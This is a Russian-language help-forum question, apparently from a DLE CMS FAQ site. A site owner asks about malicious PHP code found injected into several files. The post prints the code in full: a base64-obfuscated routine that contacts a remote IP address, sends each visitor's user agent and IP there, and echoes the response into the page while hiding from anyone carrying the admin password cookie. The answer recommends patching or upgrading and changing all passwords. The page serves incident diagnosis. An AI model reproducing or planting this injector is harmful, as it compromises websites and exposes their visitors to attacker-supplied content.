Не нравятся результаты поиска? Попробуйте другой поиск!
dle-faq.ru FAQ (все вопросы) Общие вопросы Взлом сайта, вредоносный код

Взлом сайта, вредоносный код


     21.09.2013    Общие вопросы    1934

вопрос
На сайте в разных файлах появляется такой код:
function getnewsfromid($id) {
    $id = intval($id);
    $rtn = $id + date("j");
    return $rtn;
}

function mysql_safe_connect($in) {
    if (getnewsfromid(64) < 1024) {
    $rtn = base64_decode($in);
    return $rtn;
    }
}
function get_all_news_by_list($newsid) {
    if (date("j") - $newsid > 320 ) {
        $rtn = false;
    } else {
    $get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzcvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']);
    if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) {
    echo @file_get_contents($get);
    }
    }
}
get_all_news_by_list (date("j"));


Плагин для tinymce spellcheker был давно удалён, НО код появился несколько дней назад..


Возможно ещё есть дырки в DLE?
Версия движка - 9.7

Ответил: 23neon23


Патчи уже давным давно валяются на оф. сайте dle-news. А вообще, чтобы с ними не париться, просто обновите dle до актуальной версии 10.0. Также советую поменять все пароли: начиная от админки, заканчивая паролями FTP, баз данных и ПУ от хостинга.

Комментарии пользователей (1)

dj-avtosh
39

1479 | 390

dj-avtosh - 26 сентября 2013 23:38 - шашлычник

Есть вирус у вас в компе)))

skype: elhan.isaev

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы